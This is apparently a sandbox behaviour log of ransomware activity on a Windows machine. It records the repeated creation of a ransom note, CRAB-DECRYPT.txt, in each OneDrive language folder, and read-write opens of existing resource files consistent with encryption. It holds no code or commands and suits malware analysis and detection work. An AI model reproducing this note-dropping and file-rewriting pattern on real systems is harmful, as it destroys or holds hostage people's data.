Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ca-es-valencia\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\cs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\cy-gb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\da\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\de\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\el\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\en\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\en-gb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\es\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\et\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\eu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\fa\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\fi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\fil-ph\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\fr\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ga-ie\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\gd-latn\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\gl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\gu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ha-latn-ng\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\he\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\hi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\hr\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\hu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\hy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\id\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ig-ng\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\imageformats\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\images\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\is\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\it\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ja\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ka\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\kk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\km-kh\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\kn\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ko\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\kok\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ku-arab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ky\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\lb-lu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\lt\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\lv\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\mi-nz\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\mk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ml-in\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\mn\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\mr\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\mt-mt\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\nb-no\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ne-np\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\nl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\nn-no\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\nso-za\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\or-in\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\pa\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\pa-arab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\pl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\platforms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\prs-af\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\pt-br\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\pt-pt\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\qml\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\qml\QtQuick\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\qml\QtQuick.2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\qut-latn\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\quz-pe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ro\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ro\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ru\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ru\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\rw\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\rw\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\SaveApplicationEventLogs.wsf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ScreenshotOptIn.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sd-arab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\si-lk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sk\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sl\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sq\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sq\FileSync.LocalizedResources.dll.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sr-cyrl-ba\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sr-cyrl-rs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
